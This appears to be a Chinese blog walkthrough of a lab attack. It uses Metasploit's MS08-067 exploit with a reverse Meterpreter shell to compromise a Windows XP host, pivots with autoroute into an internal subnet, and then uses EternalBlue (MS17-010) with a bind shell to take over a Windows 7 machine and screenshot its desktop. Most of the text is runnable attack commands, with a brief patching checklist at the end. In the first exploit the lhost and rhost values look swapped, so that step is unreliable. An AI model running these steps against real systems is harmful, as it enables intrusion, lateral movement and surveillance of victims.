跨网段攻击利用ms-17-010,ms-08-067攻击win7

368 阅读4分钟

漏洞复现

复现环境:

攻击机:Linux kali[i3桌面环境](IP:192.168.192.129)

跳板机:windowsXP(ip:172.168.76.2,192.168.192.130)

靶机:Windows 7 旗舰版(x64)(IP:172.168.76.3)

实验条件:kai可以和XP可以相互ping通,win7可以和xp相互ping通,并且靶机(无ms17-010,ms08-017漏洞的相关补丁)开启了445端口,防火墙是关闭的!

注意:这里的i3桌面环境对实验无任何影响,在本次实验中如有任何让你感到与你的实验中不同的界面不要怀疑它,你的也许也是对的

确认自己攻击机ip及靶机ip

kali终端命令

ip a

windos终端命令

ipconfig

以上命令查到的ip要确保两台机器在同一个网段,默认情况下,例如192.16.168.1和192.16.168.2这样的被.分隔开的前三个的是一样的在同一网段。

攻击前记得nmap扫描敌坐标端口情况

nmap  目标敌ip

如下图可见目标敌主机的渗透利用的必要端口开启

image.png

启动msfconsole,开始攻击流程

msfconsole

如下界面继续以下操作:

msfconsole.png 搜索ms08-067的代码

search ms08-067

接下来使用仅有的攻击模块进行攻击

use 0

查看攻击载荷

show payloads

image.png 设置载荷单元

set payload windows/meterpreter/reverse_tcp

锁定敌坐标方位:

set lhost 192.168.192.130

设置本机攻击单元坐标方位:

set rhost 192.168.192.129

检查攻击诸元是否就绪

show options

image.png 如上图, 目标方位rhost好,攻击单元lhost好,攻击端口lport好,载荷Payload options好,敌端口rhost好, 3,2,1,攻击!

run

日冕风暴即将到来 image.png 攻击成功

首先打开控制终端

shell

使用命令寻找可外网连接主机

arp -a

image.png

出现以上ip,发现非本系统所在ip段

退出控制终端

exit

将新的IP段添加到路由表

run autoroute -s 172.168.76.0/24

验证ip段配置是否成功

run autoroute -p

如果出现了刚刚加入的ip段就添加成功了。

退出到攻击单元控制平台

quit

接下来是win7的内网渗透,由于是内网所以需要攻击机主动连接,只能使用正向连接

攻击前nmap扫描敌坐标端口情况,新启动一个终端中使用以下操作

nmap 目标敌ip

如下图可见目标敌主机的渗透利用的必要端口开启 image.png 目标

回到msfconsole,继续攻击流程

搜索ms17-010的代码

search ms17_010

在出现的数个模块中 auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。通常配合使用,通常先扫描,若显示有漏洞,再进行攻击。

接下来use需要的模块,比如我们要使用3模块进行扫描就输入以下命令##这里我的3模块是扫描模块##

use 3

锁定敌坐标方位:

set rhost 172.168.76.3

设置本机攻击单元坐标方位:

set lhost 192.168.192.129

执行run运行模块进行雷达扫描一下我们的目标是否有防御漏洞

run

出现以下的类似情况表示ms17-010漏洞存在 image.png

退出扫描模块开始我们的攻击

(这里我的攻击模块是0号模块)

search ms17_010

use 0

查看攻击载荷

show payloads

image.png 设置载荷单元(这里选择的载荷为主动连接敌主机的载荷)

set payload windows/x64/meterpreter/bind_tcp

锁定敌坐标方位:

set rhost 172.168.76.3

设置本机攻击单元坐标方位:

set lhost 192.168.192.129

检查攻击诸元是否就绪

show options

image.png 如上图, 目标方位rhost好,攻击单元lhost好,攻击端口lport好,载荷Payload options好,敌端口rhost好, 3,2,1,攻击!

run

日冕风暴即将到来

image.png 出现上图就攻击成功了

攻击成功开始篡改终端

首先看看敌主机在干嘛,截个图来看看 (注意该命令不加任何参数截图将会保存到以下路径:~/

screenshot

PaCOIkIZ.jpeg 原来在看《流浪地球2》啊,那就引用李雪健老师饰演的周喆直的一句话吧:我们的人一定会完成任务

接下来对win7的一些操作可以参考上期文档,文档还在持续更新中。

juejin.cn/post/725367…

其他的一些操作我就不展示了

至此神州司械宣布跨网段攻击成功

MS08-017,MS17-010漏洞防范

  • 关闭无关端口
  • 打开防火墙
  • 安装安全软件
  • 安装相应的补丁